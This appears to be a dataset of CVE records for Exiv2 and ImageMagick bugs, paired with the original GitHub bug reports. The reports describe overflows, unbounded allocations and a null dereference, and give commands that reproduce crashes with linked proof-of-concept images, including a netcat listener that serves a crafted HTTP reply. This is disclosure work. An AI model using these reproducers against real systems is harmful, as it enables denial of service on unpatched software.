"source": "[email protected]",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/01/msg00004.html"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FGBT5OD2TF4AIXJUC56WOUJRHAZLZ4DC/"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://usn.ubuntu.com/4056-1/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:exiv2:exiv2:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4BFA28DF-4BFE-4CA7-A2F7-F471F91B856E",
"versionEndExcluding": null,
"versionEndIncluding": "0.27.1",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:30:*:*:*:*:*:*:*",
"matchCriteriaId": "97A4B8DF-58DA-4AB6-A1F9-331B36409BA3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*",
"matchCriteriaId": "7A5301BF-1402-4BE0-A0F8-69FBE79BC6D6",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*",
"matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.10:*:*:*:*:*:*:*",
"matchCriteriaId": "07C312A0-CD2C-4B9C-B064-6409B25C278F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*",
"matchCriteriaId": "CD783B0C-9246-47D9-A937-6144FE8BFF0F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/Exiv2/exiv2/issues/843 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"Exiv2",
"exiv2"
] | The problem is that the calculation of `o+2` can overflow at [crwimage_int.cpp:284](https://github.com/Exiv2/exiv2/blob/f4a37c63f2f890c16ff7192fc89a75a7c34ae82b/src/crwimage_int.cpp#L284).
![issue_843_poc](https://user-images.githubusercontent.com/4358136/57623256-52b2e000-7587-11e9-9696-70483a645830.jpg)
Reproducible on the 0.27-maintenance branch ([f4a37c6](https://github.com/Exiv2/exiv2/commit/f4a37c63f2f890c16ff7192fc89a75a7c34ae82b)):
```
exiv2 issue_843_poc.jpg
``` | Integer overflow causes out-of-bounds read in CiffDirectory::readDirectory() | https://api.github.com/repos/Exiv2/exiv2/issues/843/comments | 2 | 2019-05-13T12:58:33Z | 2019-07-01T09:02:45Z | https://github.com/Exiv2/exiv2/issues/843 | 443,384,339 | 843 |
CVE-2019-13111 | 2019-06-30T23:15:10.113 | A WebPImage::decodeChunks integer overflow in Exiv2 through 0.27.1 allows an attacker to cause a denial of service (large heap allocation followed by a very long running loop) via a crafted WEBP image file. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/Exiv2/exiv2/issues/791"
},
{
"source": "[email protected]",
"tags": [
"Patch"
],
"url": "https://github.com/Exiv2/exiv2/pull/797"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FGBT5OD2TF4AIXJUC56WOUJRHAZLZ4DC/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:exiv2:exiv2:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4BFA28DF-4BFE-4CA7-A2F7-F471F91B856E",
"versionEndExcluding": null,
"versionEndIncluding": "0.27.1",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:30:*:*:*:*:*:*:*",
"matchCriteriaId": "97A4B8DF-58DA-4AB6-A1F9-331B36409BA3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/Exiv2/exiv2/issues/791 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"Exiv2",
"exiv2"
] | There is a bug at [webpimage.cpp:515](https://github.com/Exiv2/exiv2/blob/55dfdb9ab007d6e6d1d06240048690eaac23b305/src/webpimage.cpp#L515). If `filesize < io_->tell()` then the subtraction overflows and the bounds check on `size` is ineffective.
There is an additional problem in this function, which is that the error conditions are not checked after the calls to `io_->read`. Calls to `io_->read` should always be followed by calls to `io_->error()` and `io_->eof()`, to make sure that the buffer was read successfully. This means that the code does not notice that the file size is much smaller than the value of `size` would suggest. This has enabled me to write a PoC which causes exiv2 to run for almost a minute, scanning 4GB of uninitialized memory.
Here is the PoC, which I have tested on master ([55dfdb9](https://github.com/Exiv2/exiv2/commit/55dfdb9ab007d6e6d1d06240048690eaac23b305)):
![poc1](https://user-images.githubusercontent.com/4358136/56674700-57842280-66b2-11e9-901a-bedeb60ba307.jpg). You can run the PoC like this to see the long-running behavior:
```
$ time exiv2 poc1.jpg
File name : poc1.jpg
File size : 28 Bytes
MIME type : image/webp
Image size : 0 x 0
poc1.jpg: No Exif data found in the file
real 0m52.738s
user 0m50.621s
sys 0m2.108s
```
Or if you use `ulimit` to lower the maximum allocation size to less than 4GB then exiv2 will crash:
```
$ ulimit -v 4000000
$ exiv2 poc1.jpg
Uncaught exception: std::bad_alloc
``` | Integer overflow, leading to very large allocation in WebPImage::decodeChunks() | https://api.github.com/repos/Exiv2/exiv2/issues/791/comments | 1 | 2019-04-24T16:03:00Z | 2019-07-01T09:03:36Z | https://github.com/Exiv2/exiv2/issues/791 | 436,781,784 | 791 |
CVE-2019-13112 | 2019-06-30T23:15:10.160 | A PngChunk::parseChunkContent uncontrolled memory allocation in Exiv2 through 0.27.1 allows an attacker to cause a denial of service (crash due to an std::bad_alloc exception) via a crafted PNG image file. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/Exiv2/exiv2/issues/845"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/Exiv2/exiv2/pull/846"
},
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/01/msg00004.html"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FGBT5OD2TF4AIXJUC56WOUJRHAZLZ4DC/"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://usn.ubuntu.com/4056-1/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:exiv2:exiv2:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4BFA28DF-4BFE-4CA7-A2F7-F471F91B856E",
"versionEndExcluding": null,
"versionEndIncluding": "0.27.1",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:30:*:*:*:*:*:*:*",
"matchCriteriaId": "97A4B8DF-58DA-4AB6-A1F9-331B36409BA3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*",
"matchCriteriaId": "7A5301BF-1402-4BE0-A0F8-69FBE79BC6D6",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*",
"matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.10:*:*:*:*:*:*:*",
"matchCriteriaId": "07C312A0-CD2C-4B9C-B064-6409B25C278F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*",
"matchCriteriaId": "CD783B0C-9246-47D9-A937-6144FE8BFF0F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/Exiv2/exiv2/issues/845 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"Exiv2",
"exiv2"
] | The attached file causes a `std::bad_alloc` exception in `exiv2`.
![issue_845_poc](https://user-images.githubusercontent.com/4358136/57626292-7e38c900-758d-11e9-99aa-85d538eea630.png)
The bug is that there is no bounds check on the value of `length` at [pngchunk_int.cpp:669](https://github.com/Exiv2/exiv2/blob/f4a37c63f2f890c16ff7192fc89a75a7c34ae82b/src/pngchunk_int.cpp#L669).
Reproducible on the 0.27-maintenance branch ([f4a37c6](https://github.com/Exiv2/exiv2/commit/f4a37c63f2f890c16ff7192fc89a75a7c34ae82b)):
```
exiv2 issue_845_poc.png
```
| Out of memory error due to unchecked allocation size in PngChunk::parseChunkContent() | https://api.github.com/repos/Exiv2/exiv2/issues/845/comments | 2 | 2019-05-13T13:42:43Z | 2019-07-01T09:04:40Z | https://github.com/Exiv2/exiv2/issues/845 | 443,405,977 | 845 |
CVE-2019-13113 | 2019-06-30T23:15:10.207 | Exiv2 through 0.27.1 allows an attacker to cause a denial of service (crash due to assertion failure) via an invalid data location in a CRW image file. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/Exiv2/exiv2/issues/841"
},
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/Exiv2/exiv2/pull/842"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FGBT5OD2TF4AIXJUC56WOUJRHAZLZ4DC/"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://usn.ubuntu.com/4056-1/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:exiv2:exiv2:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4BFA28DF-4BFE-4CA7-A2F7-F471F91B856E",
"versionEndExcluding": null,
"versionEndIncluding": "0.27.1",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:30:*:*:*:*:*:*:*",
"matchCriteriaId": "97A4B8DF-58DA-4AB6-A1F9-331B36409BA3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*",
"matchCriteriaId": "7A5301BF-1402-4BE0-A0F8-69FBE79BC6D6",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*",
"matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.10:*:*:*:*:*:*:*",
"matchCriteriaId": "07C312A0-CD2C-4B9C-B064-6409B25C278F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*",
"matchCriteriaId": "CD783B0C-9246-47D9-A937-6144FE8BFF0F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/Exiv2/exiv2/issues/841 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"Exiv2",
"exiv2"
] | The attached file causes an assertion failure in `exiv2`.
![issue_841_poc](https://user-images.githubusercontent.com/4358136/57619635-45452800-757e-11e9-8496-9e198b7f53f4.jpg)
Reproducible on the 0.27-maintenance branch ([f4a37c6](https://github.com/Exiv2/exiv2/commit/f4a37c63f2f890c16ff7192fc89a75a7c34ae82b)):
```
exiv2 issue_841_poc.jpg
``` | Invalid data location in CRW image causes exiv2 to crash | https://api.github.com/repos/Exiv2/exiv2/issues/841/comments | 3 | 2019-05-13T11:53:23Z | 2019-07-01T09:05:47Z | https://github.com/Exiv2/exiv2/issues/841 | 443,356,775 | 841 |
CVE-2019-13114 | 2019-06-30T23:15:10.267 | http.c in Exiv2 through 0.27.1 allows a malicious http server to cause a denial of service (crash due to a NULL pointer dereference) by returning a crafted response that lacks a space character. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Broken Link"
],
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00009.html"
},
{
"source": "[email protected]",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/Exiv2/exiv2/issues/793"
},
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/Exiv2/exiv2/pull/815"
},
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/01/msg00004.html"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FGBT5OD2TF4AIXJUC56WOUJRHAZLZ4DC/"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://support.f5.com/csp/article/K45429077?utm_source=f5support&%3Butm_medium=RSS"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://usn.ubuntu.com/4056-1/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:exiv2:exiv2:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4BFA28DF-4BFE-4CA7-A2F7-F471F91B856E",
"versionEndExcluding": null,
"versionEndIncluding": "0.27.1",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:30:*:*:*:*:*:*:*",
"matchCriteriaId": "97A4B8DF-58DA-4AB6-A1F9-331B36409BA3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*",
"matchCriteriaId": "7A5301BF-1402-4BE0-A0F8-69FBE79BC6D6",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*",
"matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.10:*:*:*:*:*:*:*",
"matchCriteriaId": "07C312A0-CD2C-4B9C-B064-6409B25C278F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*",
"matchCriteriaId": "CD783B0C-9246-47D9-A937-6144FE8BFF0F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/Exiv2/exiv2/issues/793 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"Exiv2",
"exiv2"
] | There is a null pointer deference bug at [http.cpp:364](https://github.com/Exiv2/exiv2/blob/55dfdb9ab007d6e6d1d06240048690eaac23b305/src/http.cpp#L364). If the http server sends back a reply that does not contain a space character, then `strchr` will return `NULL`, leading to a null pointer dereference in `atoi`.
To reproduce the bug (tested on master: [55dfdb9](https://github.com/Exiv2/exiv2/commit/55dfdb9ab007d6e6d1d06240048690eaac23b305)) open two terminals. In the first terminal, start a fake webserver using [response1.txt](https://github.com/Exiv2/exiv2/files/3113957/response1.txt):
```
cat response1.txt | sudo nc -l -p 80
```
In the second terminal, try to connect to the fake webserver:
```
exiv2 http://127.0.0.1/test.jpg
```
There are several other calls to `strcat` and `strstr` in the same [block of code](https://github.com/Exiv2/exiv2/blob/55dfdb9ab007d6e6d1d06240048690eaac23b305/src/http.cpp#L339-L396). I have not written PoCs for them, but the calls to `strchr` on lines [351](https://github.com/Exiv2/exiv2/blob/55dfdb9ab007d6e6d1d06240048690eaac23b305/src/http.cpp#L351) and [362](https://github.com/Exiv2/exiv2/blob/55dfdb9ab007d6e6d1d06240048690eaac23b305/src/http.cpp#L362) also look vulnerable to me. | null pointer dereference in http.cpp | https://api.github.com/repos/Exiv2/exiv2/issues/793/comments | 4 | 2019-04-24T20:14:50Z | 2019-07-01T09:07:49Z | https://github.com/Exiv2/exiv2/issues/793 | 436,886,165 | 793 |
CVE-2019-13133 | 2019-07-01T20:15:11.180 | ImageMagick before 7.0.8-50 has a memory leak vulnerability in the function ReadBMPImage in coders/bmp.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html"
},
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick/commit/fe3066122ef72c82415811d25e9e3fad622c0a99"
},
{
"source": "[email protected]",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick/issues/1600"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F8AB2B06-598F-4F38-813C-B1E3E1E7EEE5",
"versionEndExcluding": "7.0.8-50",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "7.0.0-0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F1E78106-58E6-4D59-990F-75DA575BFAD9",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*",
"matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/ImageMagick/ImageMagick/issues/1600 | [
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"ImageMagick",
"ImageMagick"
] | ### Prerequisites
- [ Y ] I have written a descriptive issue title
- [ Y ] I have verified that I am using the latest version of ImageMagick
- [ Y ] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported
### Description
<!-- A description of the bug or feature -->
There are two memory leak issues in ReadBMPImage in coder/bmp.c and ReadVIFFImage in coder/viff.c.
There is a patch https://github.com/ImageMagick/ImageMagick/commit/3b48d20df53ad048af05107aa1850c344466b082, which fixed multiple memory leak vulnerabilities.
However, the patch for ReadBMPImage is wrong.
```
if (GetNextImageInList(image) == (Image *) NULL)
{
- image=DestroyImageList(image);
+ status=MagickFalse;
return((Image *) NULL);
}
```
Below is the correct logic.
```
if (GetNextImageInList(image) == (Image *) NULL)
{
- image=DestroyImageList(image);
- return((Image *) NULL);
+ status=MagickFalse;
+ break;
}
```
https://github.com/ImageMagick/ImageMagick/blob/master/coders/bmp.c#L1508
At the same time, there is the same issue in ReadVIFFImage.
```
if (GetNextImageInList(image) == (Image *) NULL)
{
image=DestroyImageList(image);
return((Image *) NULL);
}
```
https://github.com/ImageMagick/ImageMagick/blob/master/coders/viff.c#L774
### Steps to Reproduce
